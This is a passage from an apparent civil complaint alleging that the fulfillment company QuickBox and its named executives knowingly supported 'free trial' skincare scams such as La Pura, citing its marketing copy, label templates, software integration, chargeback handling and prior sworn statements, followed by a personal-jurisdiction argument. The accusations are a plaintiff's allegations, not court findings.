[44] Memorandum of Law In Support of Motion to Dismiss at 3, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 41 (emphasis added).

240.   In fact, Quick Box LLC does provide advertising to its clients (alongside many other marketing services tailored specifically to the free trial scam). The QuickBox Defendants directly write proposed advertising copy and provide those draft advertisements as examples to its customers. But Quick Box LLC repeated this false statement—that it does not provide any advertising and that it is a mere fulfillment company—in a sworn declaration from its Chief Financial Officer, Nicholas Martell.[45]

241.   Similarly, Quick Box LLC's CEO, Defendant Stephen Adele, lied under oath in a deposition about the services the QuickBox Defendants provide to their customers, falsely testifying in the New York action that: "Well, how – how our clients market their products or produce marketing claims is not something that we participate in."[46]

242.   These sworn statements are belied by what QuickBox tells its clients in presentations available on its own website. The QuickBox Defendants tout the expertise of their owners in marketing "nutra" products as being one of the benefits of hiring them:[47]

**Owners Were Marketers**
better able to serve our customer base

---

[45] Declaration of Nicholas Martell, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 39.
[46] Ex. I at 18:8-10, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 71.
[47] QuickBox Press Kit 2020, https://quickbox.com/wp-content/uploads/2020/04/QuickBoxFulfillment_PressKit_2020.pdf (last visited Apr. 16, 2020).

243.    In another presentation, the QuickBox Defendants expand upon their owners' role in advising their clients on their businesses: "Our ownership team has a combined experience of over 75 years in the health and beauty sector. 20+ years in nutraceutical formulation and 15+ years of experience in skincare brand development has allowed us to create our complete line of custom dietary supplements and skincare treatments which are available through our OnDemand, white label inventory program. In addition, our other owners all come from a background of building and selling scalable and profitable health and beauty e-commerce businesses."[48]

244.    The QuickBox Defendants provide product sheets for their private labeled products. Those product sheets not only specifically suggest a product design, they also include detailed sample advertising copy written by QuickBox and provided to its clients to assist them in marketing their versions of the product. An example for "Hydrofirm" appears below:[49]



---

[48] QuickBox Website, https://quickbox.com/wp-content/uploads/2019/02/20-Questions-to-Ask_V2.pdf (last visited Apr. 16, 2020).
[49] QuickBox Website, https://quickbox.com/wp-content/uploads/2018/12/Hydrofirm_ProductSheet_V2.pdf (last visited Apr. 16, 2020).

245.   These product sheets contain detailed pre-written advertising copy created by QuickBox for use by its customers, including references to purported scientific studies, descriptions of the benefits of the products, and the benefits of the ingredients. For example, the Hydrofirm product sheet above contains pre-written language that can simply be copy-pasted into a website or advertisement:

## Hydrofirm for Maximum Skin Moisture and Anti-Aging!

Featuring advanced ingredients to reduce the appearance of fine lines and wrinkles, while maintaining maximum moisture, Hydrofirm is a 2 in 1 day and night cream. It was specially formulated to improve the skin's texture, elasticity, and firmness, as it diminishes and prevents fine lines and wrinkles, and has been shown to:

• Smooth Out Fine Lines and Wrinkles*
• Boost Collagen Production and Promote Skin Cell Renewal*
• Provide Deep Hydration to Skin, Instantly*
• Improve Overall Skin Tone and Texture*

All with no side effects, toxins, or health risks!

246.   Notably, the La Pura advertising copy on its website is simply a re-written version of the advertising copy QuickBox provides to its clients for wrinkle creams. Far from being just a simple fulfillment company, QuickBox did in fact write the language that was ultimately used on the La Pura scam website. Compare QuickBox's suggested bulleted copy in one of its product sheets[50] to the final bulleted version used by the La Pura scammers:[51]



---

[50] QuickBox Website, https://quickbox.com/wp-content/uploads/2017/03/ssHydrofirm.pdf (last visited Apr. 16, 2020).
[51] La Pura Website, https://www.try-la-pura-skincare.com/lm/ (last visited Apr. 16, 2020).

247. Both feature bullets of purported benefits to the skin creams. Both promise "hydration," and both promise to eliminate "wrinkles" and "fine lines." Both promise to improve "elasticity" and "firmness."

248. Their role in marketing is not the only thing QuickBox lied to the New York Federal Court about. QuickBox further told that court that: "QuickBox does not ever advertise or sell products to consumers, has nothing to do with its clients' websites, **and does not suggest, choose or approve its clients' brand names or labels.**"[52]

249. But on its website, QuickBox states the exact opposite: "We source and fill your packaging and label your products all in-house. **Use our FDA compliant label templates to build your custom brand.** Our clients labels are kept under lock-and-key and always kept in stock."[53]

250. QuickBox provides its own "OnDemand Private Labeling" service for its clients to simply affix their own design and logo to products created by QuickBox.[54] QuickBox describes this program as follows: "Choose from 21 of the top-selling cosmetic, nutraceutical and pet care formulas in the industry, on a just-in-time-inventory basis. Our custom formulas are proven to convert and keep your customers coming back for more."[55]

251. Contrary to their representation to the New York court that they do not "suggest" their clients brand names or labels, the QuickBox Defendants specifically offer a service to design custom packaging and kitting: "Perfect your packaging experience to retain customers and showcase your unique brand. The QB team will make sure your customer's first impression of your brand is one to remember."[56]

---

[52] Reply Brief in Support of Motion to Dismiss at 2, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 74 (emphasis added).
[53] QuickBox Website, https://quickbox.com/pages-private-labeling-offer/ (last visited Apr. 16, 2020) (emphasis added).
[54] QuickBox Website, https://quickbox.com/pages-private-labeling-offer/ (last visited Apr. 16, 2020).
[55] *Id.*
[56] QuickBox Website, https://quickbox.com/fulfillment-services/ (last visited Apr. 16, 2020).

252.   The QuickBox Defendants tout a custom label design service in presentations to their customers, stating "Your Label – Using Our Label Templates," and "Label design (we can even assist)."[57]



253.   The QuickBox Defendants also state on their site that they offer "Designed & Printed Labels."[58] They describe that as a basic step in their process: "Once you've selected your product formula we'll design and print labels approved by you to fit your brand."[59]

254.   They further tout their ability to create custom branded packaging for their clients: "We work with several high-end packaging companies in Denver and Atlanta to create completely custom branded packaging, if desired."[60]

---

[57] QuickBox Website, https://quickbox.com/wp-content/uploads/2019/01/QuickBox-OnDemand-Client-Presentation2019.pdf (last visited Apr. 16, 2020).
[58] QuickBox Website, https://quickbox.com/private-label/ (last visited Apr. 16, 2020).
[59] *Id.*
[60] QuickBox Website, https://quickbox.com/wp-content/uploads/2019/02/20-Questions-to-Ask_V2.pdf (last visited Apr. 16, 2020).

255.   QuickBox provides a custom label for its skin cream product using "Hydrofirm" as the example name. It is clear that contrary to its sworn representations to the New York Federal Court, QuickBox is "suggesting" labels to its clients and participating in the marketing. And it is clear that the intent is to enable those clients to simply make up a name and copy-paste it onto the products, with the entirety of the rest of the label designed by QuickBox:[61]



256.   The label above is just one of several pre-designed label options QuickBox provides for wrinkle creams with varying sizes and descriptions.[62] The QuickBox website contains dozens upon dozens of pre-made labels for a variety of products, most of which are for the kinds of products which are commonly shipped by free trial scammers, such as diet or brain pills.

257.   QuickBox further lied to the New York Federal Court when it stated it "has nothing to do with its clients' websites...."[63] QuickBox CEO Stephen Adele compounded this by falsely testifying: "Again, we do not review or provide any guidance to our clients on their marketing websites, given that they are, in fact, our client."[64] In fact, QuickBox

---

[61] QuickBox Website, https://quickbox.com/wp-content/uploads/2017/11/Hydrofirm-30ml_Template_outlined.pdf (last visited Apr. 16, 2020).
[62] *See* QuickBox Website, https://quickbox.com/wp-content/uploads/2019/02/Hydrofirm30ml_Template_V2.pdf (last visited Apr. 16, 2020); http://quickbox.com/wp-content/uploads/2018/02/Hydrofirm30ml_Template_CQP17-1.pdf (last visited Apr. 16, 2020); https://quickbox.com/wp-content/uploads/2018/06/Hydrofirm30ml_Template.pdf (last visited Apr. 16, 2020); http://quickbox.com/wp-content/uploads/2018/02/InstantLift_Template_cqp17.pdf (last visited May 27, 2020).
[63] Reply Brief in Support of Motion to Dismiss at 2, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 74 (emphasis added).
[64] *Id.* at 115:8-10.

provides software integration services that involve integrating shopping carts and CRM software with its clients' websites.

258.   A form contract on QuickBox's website makes clear that not only do they partner with the Konnektive Defendants, but that QuickBox offers software integration services to customers (in other words, computer programmers working for QuickBox will program the client's chosen CRM software so that it can interact with the Konnektive Defendants' bank fraud software and send data from the client's website to Konnektive's software).[65] The QuickBox agreement offers these integration services for a list of software products, and further offers to generally provide software integration services for other CRM's or shopping carts.[66]

259.   QuickBox offers these integration services on its website: "Partnering with technology leaders in the industry to offer value-added services and complete end-to-end solutions with hassle free integrations."[67]

260.   QuickBox further offers "Integration of Your Online Shopping Cart with the QB Fulfillment Software System."[68]

261.   QuickBox promises its customers: "We easily integrate with any CRM, marketplace or EDI provider. We do the integration, and we do it fast."[69] EDI stands for Electronic Data Interchange, or the process of transferring information between businesses.

262.   In a Q & A on its website, the QuickBox Defendants confirm that they are in fact integrating software with their clients' websites: "Can you integrate with our Website or existing systems? We are integrated with just about every CRM and shopping cart

---

[65] QuickBox Fulfillment Agreement, https://www.quickbox.com/wp-content/uploads/2018/03/QB-Fulfillment-Agreement-2.docx (last visited April 16, 2020).
[66] Id.
[67] QuickBox Website, https://quickbox.com/quickbox-fulfillment-request-a-quote-a/ (last visited Apr. 16, 2020).
[68] QuickBox Website, https://quickbox.com/private-label/ (last visited Apr. 16, 2020).
[69] QuickBox Website, https://quickbox.com/wp-content/uploads/2019/01/QuickBox-Fulfillment-Presentation-2019-.pdf (last visited Apr. 16, 2020).

technology out there. Integrations are seamless and QuickBox does all the heavy lifting for you."[70]

263.   The shopping carts QuickBox is integrating are directly a part of their clients' websites—meaning that QuickBox does, in fact, have something to do with its clients' websites. And CRM software (Customer Relationship Management) directly connects to those scammers' websites to gather and manipulate customer data.

264.   The QuickBox Defendants further advertise on their website that the Konnektive Defendants are their partner.[71] This strongly suggests that the QuickBox Defendants had knowledge of the fraud they were participating in, as the Konnektive Defendants prominently acknowledge on their own website that their software is in violation of banking rules. The Konnektive software was designed specifically for the purpose of facilitating automated bank fraud—and the QuickBox Defendants would necessarily have had knowledge of this fact because they helped their scammer clients to install and use it. On information and belief, the QuickBox Defendants introduce their clients (such as the La Pura Defendants) to Konnektive, another act in furtherance of the fraud.



OUR CRM & E-COMMERCE PARTNERS

265.   The United States District Court judge in the New York case flatly rejected Quick Box's claims to be a mere fulfillment company, stating: "QuickBox argues that

---

[70] QuickBox Website, https://quickbox.com/wp-content/uploads/2019/02/20-Questions-to-Ask_V2.pdf (last visited Apr. 16, 2020).
[71] QuickBox Website, https://quickbox.com/e-commerce-partners/ (last visited Apr. 16, 2020).

fulfillment companies should not be subject to personal jurisdiction wherever they happen to ship an infringing product. Even if that argument were meritorious, QuickBox appears to be far more than simply a fulfillment center.  The record shows that QuickBox plays multiple critical roles in the infringement process.  Not only does QuickBox supply the infringing product itself, it also affixes the infringing label (although purportedly provided by third-parties), packages the product, and places it with the carrier to be delivered. Thereafter, QuickBox is also responsible for processing any returns."[72]

266.   While the judge there saw through these misrepresentations, it is disturbing that they were made in the first place. And this willingness to lie under oath is heavily indicative of the kind of operation the QuickBox Defendants are running: not a "fulfillment company," but a scam consulting operation masquerading as one in an effort to avoid legal liability for actions it knows are unlawful.

267.   Because of their broad involvement in their customers' businesses, the QuickBox Defendants would know the exact nature of the scams they were assisting them to operate, including how the La Pura scam worked.

268.   The QuickBox Defendants handle returns for their customers, meaning they would inevitably have knowledge of complaints from the victims of the free trial scams they are assisting in. They offer "full returns processing services" which they describe as follows: "Accepting your returned product with same day customer refund processing Monday-Friday. Detailed return to stock monitoring ensures that your good product is placed back into inventory to save on cost."[73]

269.   Indeed, not only do they handle returns, but Defendant Stephen Adele bragged in an e-book he authored that the QuickBox Defendants can assist with "returns/refunds

---

[72] Opinion and Order at 7, *RV Skincare Brands LLC v. Digby Investments Limited et al*, No. 1:18-cv-08411-VEC (S.D.N.Y Feb. 14, 2019), dkt. 83 (internal citations omitted).
[73] *Id.*

and chargebacks."[74] Chargebacks are the primary way that frauds such as La Pura are identified. By handling chargebacks, the QuickBox Defendants would have instantly known that the La Pura products were a fraud because of the unusually high rates of chargebacks such a scam inevitably generates.

> Enter third-party fulfillment services. These are companies that complete the order fulfillment steps for the business, entrepreneur, or online seller, removing the day-to-day challenges of having to pull orders, maintain a warehouse and staff, deal with inventory discrepancies, returns/refunds and chargebacks, etc.

270.   The QuickBox Defendants also conduct detailed analysis of their clients' businesses as part of an inventory analysis service: "Our dedicated inventory analysts work with you on a weekly basis to forecast your new sales volume and rebills. With the QuickBox OnDemand solution, each Monday we place just enough inventory for the current week's sales volume into your fulfillment account. This means you will never have unsold or leftover inventory tying up your cash."[75] The QuickBox Defendants would have known full well that the La Pura John Does were engaging in fraud by virtue of this weekly analysis they were performing on the product's "rebills"—its subscription payments.

271.   Indeed, a search of QuickBox's Colorado address on the Better Business Bureau website shows it is referenced in more than 300 complaints regarding at least 38 other products.[76] And the Better Business Bureau's page on QuickBox Fulfillment features multiple complaints from victims of free trial scams, **all of whom the QuickBox**

---

[74] Stephen Adele, *Do You Need a Fulfillment Service?*, https://quickbox.com/wp-content/uploads/2019/02/Do-You-Need-a-Fulfillment-Service_QBeBook_2019.pdf (last visited Apr. 16, 2020).
[75] QuickBox Website, https://quickbox.com/private-label/ (last visited Apr. 16, 2020).
[76] *See* https://www.google.com/search?q=site:bbb.org+%2211551+E+45th+Ave.+Unit+C.%22&ei=TU96XqvqLK6w_QbI6aXABQ&start=150&sa=N&filter=0&ved=2ahUKEwjrxM_k3LPoAhUuWN8KHch0CVg4jAEQ8tMDegQIDBA9&biw=2327&bih=1216.

**Defendants responded to.**[77] One of these complaints even threatened to call the FBI regarding QuickBox's participation in these scams. And yet QuickBox's only response was to again play Sergeant Shultz, claiming to have no knowledge of anything whatsoever.

272.   On information and belief, the QuickBox Defendants were acting as consultants to assist "free trial" scammers in operating their scams, and they did so for the La Pura Defendants from at least February 2019 through the present. And on information and belief, the QuickBox Defendants acted as consultants to assist the La Pura scammers in defrauding consumers, they knew that the fraud was occurring, and intentionally continued to aid and support La Pura in their fraud despite this knowledge.

273.   QuickBox's executive team—Defendants Stephen Adele, Chad Biggins, and James Martell—are no strangers to "free trial" scams.

274.   QuickBox was founded by Defendant Chad Biggins and another Chad—Chad Buckendahl.  Mr. Biggins and Mr. Buckendahl have long been business partners in similar endeavors and originally named QuickBox "2Chads Fulfillment" ("2Chads").[78]

---

[77] QuickBox Fulfillment BBB Page, https://www.bbb.org/us/co/denver/profile/fulfillment-services/quickbox-fulfillment-0885-90123217/complaints (last visited May 27, 2020).
[78] *See* https://quickbox.com/wp-content/uploads/2018/12/20-Questions-to-Ask.pdf ("QuickBox Fulfillment was founded in 2004 as 2Chads. In 2017 2Chads rebranded as QuickBox Fulfillment....")(last visited May 27, 2020).

275.   Documents from its prior incarnation as "2Chads" make clear that QuickBox has always been much more than just a fulfillment company. It also actively designed websites for its clients and assisted them with their marketing efforts.  For example, 2Chads employed an individual named Matt Midthun from 2010 to 2011. Mr. Midthun was the Director of Performance Marketing at 2Chads, and his description of his duties on his LinkedIn profile makes it clear that QuickBox was managing marketing campaigns, developing and launching affiliate programs, and designing websites:[79]



276.   It is clear from the foregoing description of Mr. Midthun's duties that QuickBox built its clients' websites, set up online resellers, and managed affiliate marketing campaigns. Notably, Mr. Midthun states that he set up an affiliate program in "Impact Radius," which is software to manage affiliate marketing partnerships—meaning that in this time period, QuickBox was itself managing the affiliate marketing programs which connected affiliates to scammers such as the La Pura Defendants.[80] At least as of 2011, the QuickBox Defendants were acting as the "affiliate network" described in the Better Business Bureau report, ex. 1, meaning that they were directly connecting scammers

---

[79] Matt Midthun LinkedIn Profile, https://www.linkedin.com/in/mattmidthun/ (last visited May 27, 2020).
[80] Impact Website, https://impact.com/affiliate-marketing/ (last visited May 29, 2020)(describing its platform as for "AFFILIATE MARKETING - One platform to manage a complex universe of partnerships.").

to affiliate advertisers who run fake celebrity ads. On information and belief, QuickBox still does so, and was directly involved in the affiliate marketing and fake celebrity advertisements described herein.

277.   On a prior iteration of its website while operating as "2Chads," QuickBox described itself as providing services specifically tailored to customers who offered "risk free trials," including services designed to "work directly with your customer service department" to minimize the number of chargebacks and services to "assist in processing refunds."[81]

> *Keying Services:* If you're running a campaign for risk free trials continuity or auto-shipments and need a solution to keep from shipping to customers that need to be canceled, 2Chads will accommodate. Many of 2Chads clients have requested these services, and received great results in reducing the occurrences of chargeback's and customer complaints. 2Chads returns team will work directly with your customer service department to assist with canceling future subscriptions, and even assist in processing refunds per your companies return policies. To our knowledge, no other Fulfillment provider even offers this type of service which can be detrimental to a longstanding marketing campaign

278.   Endorsements featured on the 2Chads website make clear that QuickBox was directly advising customers on their marketing campaigns. One customer even called QuickBox "direct marketers," which means they marketed products directly to consumers without intermediaries.[82]

---

[81] Archive.org copy of 2Chads.com, April 1, 2016
https://web.archive.org/web/20160401123120/http://2chads.com/how-it-works.html (last visited May 27, 2020).
[82] Archive.org copy of 2Chads.com, April 1, 2016
https://web.archive.org/web/20160401123425/http://2chads.com/solutions.html (last visited May 27, 2020).

*"You won't meet a more dedicated, professional, results oriented group of individuals than 2Chads. They are one of the, if not the most honest direct response marketers I have ever worked with."*
**Marc P.**
**General Manager**
**Leading CPA Network**

*"Having been involved in direct marketing on the Web for the past 11 years I've worked with multitudes of agencies, fulfillment houses, Web developers, Internet consultants and plenty of so-called gurus. At the very top of that list sits 2Chads. What separates 2Chads from all the others is their attention to detail, their vast knowledge-base of direct marketing metrics and best practices and their unwavering devotion to making companies that are lucky enough to work with them—successful."*
**Mike B.**
**Director of Marketing**
**High-end Pet Nutrition Company**

279.   Moreover, QuickBox previously provided "white papers" to its clients advising them on how to market their products, design their websites, and maximize customer "conversions" or purchases.[83] On information and belief, QuickBox continues to provide similar assistance to its customers.

280.   As of 2019, QuickBox lists Defendant Chad Biggins as its co-owner, along with James Martell.[84] Mr. Biggins is currently part of the "executive management" of the company, and on information and belief, is heavily involved in its decision-making and was responsible as a co-founder for its strategy of pursuing free trial scammers as its customers. On information and belief, Mr. Biggins is one of the owners whose marketing experience QuickBox touts to its customers and who was involved in the creation of its skincare "white label" program.[85] This program was used by the La Pura Defendants, and on information and belief, Mr. Biggins was involved in the creation of the sample marketing language which was provided by QuickBox to the La Pura Defendants and which was ultimately used to deceive Plaintiff and the Class.

281.   Defendant Stephen Adele is currently QuickBox's CEO.  QuickBox proudly states that, prior to joining QuickBox, Mr. Adele sold "a weight loss supplement" and that

---

[83] Archive.org copy of 2Chads.com, April 1, 2016 https://web.archive.org/web/20160401123232/http://2chads.com/business-intelligence-archive.html (last visited May 27, 2020).
[84] QuickBox Fulfillment Press Kit 2019, https://quickbox.com/wp-content/uploads/2019/02/QuickBoxFulfillment_PressKit_2019.pdf (last visited May 27, 2020).
[85] QuickBox Website, https://quickbox.com/wp-content/uploads/2019/02/20-Questions-to-Ask_V2.pdf (last visited Apr. 16, 2020).

Mr. Adele - via his weight loss supplement - was the first customer of 2Chads.[86]   Mr. Adele's supplement was "Lean System 7" sold by iSatori.   In 2014, testimony before the United States Senate Subcommittee Hearing on *False & Deceptive Advertising of Weight Loss Products* identified Lean System 7 as making unsupported "clinically proven claims" and claims of "doctor recommended" without proper surveys of actual doctors.[87]   In a SEC filing for a merger between iSatori and FitLifeBrands, the company stated, "Through iSatori's online marketing system, its network affiliates use a multi-channel approach which includes search engine marketing, email campaigns, banner advertisements and additional affiliate programs to acquire new customers and retain a repeatable customer base."[88]

282.   On information and belief, Mr. Adele has continued to assist in affiliate marketing in his role at QuickBox for scammers including the La Pura Defendants. Mr. Adele's participation in the scheme is demonstrated by his decision to lie under oath before a New York Federal Court by claiming that QuickBox does not "review or provide any guidance to our clients on their marketing websites," and that "how our clients market their products or produce marketing claims is not something that we participate in...." As CEO (and as a former customer), he could not be unaware that QuickBox writes the marketing copy for its clients, advises them on marketing, provides software development and integration services that specifically involve working on its customers websites, and touts

---

[86] QuickBox Fulfillment Press Kit 2019, https://quickbox.com/wp-content/uploads/2019/02/QuickBoxFulfillment_PressKit_2019.pdf (last visited May 27, 2020).
[87] https://books.google.com/books?id=p1WaTN5qOSQC&pg=PA44&lpg=PA44&dq=%22Lean+System+7%22+scam&source=bl&ots=3LVvRhowPJ&sig=ACfU3U2E8Kz_dbRHCJIVXI8yTsrUnu-L_Q&hl=en&sa=X&ve;
d=2ahUKEwjXu6y2nsfnAhWHq1kKHf4cBD4Q6AEwAnoECAoQAQ#v=onepage&q=%22Lean%20System%207%22%20scam&f=false at 44; http://www.asrcreviews.org/wp-content/uploads/2014/06/2014-Lee-Peeler-Protecting-Consumers-from-False-and-Deceptive-Advertising-of-Weight-Loss-Products-Testimony-to-U.S.-Senate-Committee.pdf
[88] FitLife Brands Inc. Form 10-K for Fiscal Year 2016, https://www.colonialstock.com/Owner/proxyDocs/Fitlife/2017/Form10k.pdf (last visited May 29, 2020).

its owners' experience in marketing as one of the primary benefits of working with them—and his decision to lie about this under oath indicates both knowledge and intent to participate in the La Pura scam, among others.

283.   Indeed, as a customer of QuickBox, Mr. Adele provided a reference touting the company's application of its marketing knowledge to his own brand:[89]

> "There are many, many firms out there who say they know marketing, but I've only found one firm who actually knows it, and knows how to apply it exceptionally well -- the 2Chads. A group that are highly knowledgeable, feverishly passionate, and professionally courteous (something you don't find much of these days in business). If I were to rate 2Chads, I'd give them an enthusiastic 5-stars!!"
>
> Stephen A.
> CEO & Founder
> iSatori; Best-selling Author, The Sports Supplement Buyers Guide

284.   And in 2017, Mr. Adele appeared on a panel discussion which involved specific discussion of the bank fraud tactics the La Pura John Does used. One of Mr. Adele's co-panelists was introduced as follows, as Mr. Adele looked on: "EZ Pay Direct is a credit card processing company that specifically deals with high-risk businesses to reduce risk, reduce costs, and build account longevities **so that we're not playing the MID flipping game.**"[90] That "MID" or Merchant ID flipping game is exactly what La Pura was playing here. And this was a repeated theme from the panelists throughout. Co-panelist Darryl Hicks of FlexPay said "The biggest difference between those businesses and some of our clients we work with on FlexPay who are generating over $100 million a year in revenue is really the foundation and the walls. Right, that's the focus that I really kind of encourage everybody to look at. Because you can't scale a house of cards, and unfortunately a lot of the businesses we see out there today, that's really what they are. We have one merchant who's on FlexPay right now, they do about $15 million a month in processing, over 350,000 auto-ships every month, and yet they're running at 72 basis points

---

[89] Archive.org copy of 2Chads.com, April 1, 2016 https://web.archive.org/web/20160401123729/http://2chads.com/why-2chads.html (last visited May 27, 2020).
[90] How Conversions are Killing Your Business, at 0:47-0:59, https://www.youtube.com/watch?v=iRLS8Vl9Ucw (last visited May 29, 2020).

in chargebacks running continuity **because they don't do free trial**. And it's a health supplement company selling pills.... **a lot of people think that, you know, pretty much everybody that comes to ADSUM is running multiple MIDs**, but there are clients sitting on Limelight who are processing $6-8 million a month on one MID...."[91] This is a textbook description of how the free trial scam's bank fraud aspect works—and what is unusual is not that a company would be using a single merchant account to process all of their payments, but that Mr. Adele would be seeking customers for QuickBox at a conference where virtually every attendee was having to "play the MID flipping game" for their free trials because their accounts were being repeatedly cancelled for fraud. Mr. Hicks described his own path in the industry as a "road littered with broken, busted-up MIDs...."[92] And Mr. Adele's co-panelist Brad Weimert said of the conference's attendees: "We have a huge group of people that juggle MIDs. And their business now, the business model has turned into managing merchant accounts."[93] This is the kind of customer Mr. Adele was recruiting to be QuickBox's clients—and it is thus no surprise that QuickBox is the fulfillment company for so many free trial scams.

285.   On information and belief, Mr. Adele personally recruited free trial scammers to be QuickBox's clients, knowing that they were conducting free trial scams and that their business model was to commit bank fraud through a rotating series of merchant accounts. On information and belief, Mr. Adele encouraged the recruitment of such scammers at QuickBox, which resulted in the company aiding and abetting the La Pura Defendants in their scam.

286.   Defendant James Martell is listed as QuickBox's co-owner, along with Defendant Biggins. Martell's LinkedIn profile lists him as VP Sales/Partner for QuickBox since December 2016.[94] In January of 2016 Mr. Martell became the President of "Brand

---

[91] *Id*. at 7:14.
[92] *Id*. at 8:37.
[93] *Id*. at 30:55.
[94] James Martell LinkedIn Page, https://www.linkedin.com/in/james-martell-32740410 (last visited May 31, 2020).

Innovate," which touts itself as a full-service branding, web development, and internet advertising agency.[95]  The company's website states that it can build its customers' websites, set up landing pages for advertisements, and perform affiliate marketing and social media advertising.[96]  Brand Innovate also offers integration to ClickBank, which is an online affiliate marketplace. On information and belief, Mr. Martell provides these services to QuickBox customers through Brand Innovate as a shell entity, and conspires with the other QuickBox Defendants to do so.

287.  Defendant Martell's LinkedIn profile also lists his "personal website" as www.mensnutrition.com.[97] This website is a blog-style website with articles ranging from supplements to nutrition advice to workouts.  The website appears to have been an affiliate marketing site as it provides a lengthy disclaimer, stating that the owners of the website receive compensation for the products written about on the site.

288.  Tellingly, Martell's website states that it is sponsored by Cruz Bay Marketing, LLC, whose partner companies distribute numerous beauty products, including Novuderm, Dermafixa, and Revitify.[98] All three of these products are "free trial" scams like La Pura. For example, Novuderm's website claimed to have a "free trial" with the exact same style bottle as the La Pura Eye Serum.[99] Affiliate links for the product tout what appears to be a classic "free trial" scheme.[100]

289.  DermaFixa is another "free trial" scam promising anti-aging benefits. The product's landing page http://www.dermafixacollagenserum.co/ is no longer accessible,

---

[95] *Id.*
[96] Brand Innovate Website, https://www.brandinnovate.com/ (last visited May 31, 2020).
[97] James Martell LinkedIn Page, https://www.linkedin.com/in/james-martell-32740410 (last visited May 31, 2020).
[98] Men's Nutrition Website, http://www.mensnutrition.com/ (last visited May 31, 2020).
[99] Novuderm Trial Website, https://web.archive.org/web/20160313040000/http://novudermtrial.com/ (last visited May 31, 2020).
[100] http://skincarebeautyproducts.blogspot.com/2016/12/NovuDermProCollagenSerumReview_1 9.html (last visited May 31, 2020).

but like La Pura and Novuderm, there are customer reviews complaining about its 14-day "free trial" scam.[101]

290.    Revitify follows the exact same blueprint as Novuderm and DermaFixa:  same affiliate links,[102] same "free trial" scheme,[103] and same unhappy victims.[104]

291.    QuickBox's management team includes another veteran of affiliate marketing, Jason Palmer. Mr. Palmer has been QuickBox's Director of Sales and Business Development since 2015.[105] Mr. Palmer's LinkedIn profile states that from 2015 until 2017, he was Marketing Director for Private Label Campaigns, which merged with QuickBox. The responsibilities for this position included: "Manage all Affiliate Relationships," "Tactical Implementation of Marketing, Web Development and Design projects," "Brand Development Strategies," and "Web Traffic Growth."

292.    The QuickBox Defendants purposely directed their activities towards California by shipping products to California residents, accepting and processing returns and complaints from California residents, consulting with the La Pura Defendants on sales that they knew would be made to California residents, and otherwise providing the services listed on their website in connection with California customers. They further worked with and had an ongoing business relationship with the La Pura Defendants, whose known shell companies are all based in California or registered to do business there, and who on information and belief are located in California.

293.    These intentional acts were expressly aimed at California residents. The QuickBox Defendants targeted their conduct at California residents, including the Plaintiff, and knew they were California residents by virtue of their shipping addresses and other

---

[101] DermaFixa BBB Page, https://www.bbb.org/us/az/phoenix/profile/online-retailer/dermafixa-1126-1000044967/complaints (last visited May 31, 2020); ScamGuard DermaFixa Page, https://www.scamguard.com/dermafixaserumnet/ (last visited May 31, 2020).
[102] http://www.healthyminimarket.com/revitify-skin-cream/ (last visited June 1, 2020).
[103] https://vimeo.com/118469788 (last visited June 1, 2020).
[104] https://www.youtube.com/watch?v=rbJpUs9sXL0 (last visited June 1, 2020).
[105] Jason Palmer LinkedIn Profile, https://www.linkedin.com/in/palmerj2/ (last visited June 1, 2020.

contact information. These acts involved ongoing, systemic, and continuous contact with California because the shipment of La Pura Products has been ongoing since at least early 2019. Those shipments occurred as part of subscriptions, meaning that the QuickBox Defendants shipped continually and regularly to their California victims over long periods of time. The acts were entirely commercial in nature, as the QuickBox Defendants marketed themselves as providing services specifically to scammers they knew would sell nationwide via the Internet.

294. The QuickBox Defendants specifically advertise to their clients that they are an ideal service to select for shipment to California. Defendant Stephen Adele is quoted in a QuickBox press release as saying: "Adele highlights three 'back-end' metrics that are important to track. The first metric being time-to-home. With nearly 70% of most consumer orders coming from California, Texas, Florida and New York making it very important to have one's business equidistant from those locations. Choosing a fulfillment center located in a place like Denver, Colorado allows businesses to get their orders [packages] to their customers in a matter or 3 to 4 business days or less, allowing them to compete with eCommerce companies like Amazon, at a fraction of the cost."[106]

295. The QuickBox Defendants generated substantial profits from their acts aimed at California residents. They intentionally assisted the La Pura Defendants in placing the La Pura Products into the stream of commerce, knowing and intending that they would be advertised over the Internet to and purchased by California consumers.

296. The QuickBox Defendants knew or should have foreseen that their actions would cause harm in California. As described above, they intentionally assisted "free trial" scammers over a lengthy period of time. They have provided various services to the La Pura scammers knowing that California consumers are being harmed by the scam, and specifically interacting with those consumers when they attempted to obtain refunds from the fraudulent charges (including by accepting and processing returns). Had they not

---

[106] QuickBox Website, https://quickbox.com/conversions-killing-business/ (last visited Apr. 16, 2020) (brackets in original).

provided these services, the California consumers would not have been harmed because the La Pura Products would not have been shipped to them and the La Pura Defendants would not have benefitted from the experience of the QuickBox Defendants in helping other "free trial" scammers design their business processes.

297.   This conduct was specifically directed at Plaintiff Tan, whose subscription was shipped by the QuickBox Defendants into the State of California, and whose injury was a foreseeable and intended cause of the various services the QuickBox Defendants provided to the La Pura Defendants.

298.   Defendants Adele, Biggins, and Martell directed this conduct and made it a matter of company policy. They intentionally sought out free trial scammers to be their clients and personally recruited them as clients at conferences where it was widely known that the majority of attendees were committing bank fraud. Indeed, Defendant Adele sat through a thirty-minute presentation discussing the mechanics of this bank fraud, and despite listening to descriptions of their business model as involving fraudulently cycling through merchant accounts, he pitched QuickBox to the audience as a company that could enable them to mitigate their chargeback risk and invited them to visit the company's headquarters. Defendants Adele, Biggins, and Martell consulted with free trial scammers on how to run their scams and assisted them by providing a variety of services, including pre-written marketing copy, website programming services, and "turn-key" products. On information and belief, Defendants Adele, Biggins, and Martell were specifically involved in advising and assisting the La Pura Defendants in their scam, resulting in injury to Ms. Tan.

299.    Because of these facts, personal jurisdiction is appropriate in California over the QuickBox Defendants.

### The Konnektive Defendants

300.   The "Konnektive Defendants" consist of Konnektive LLC, Konnektive Corporation, Martorano Holdings LLC, Konnektive Rewards LLC, Matthew Martorano,

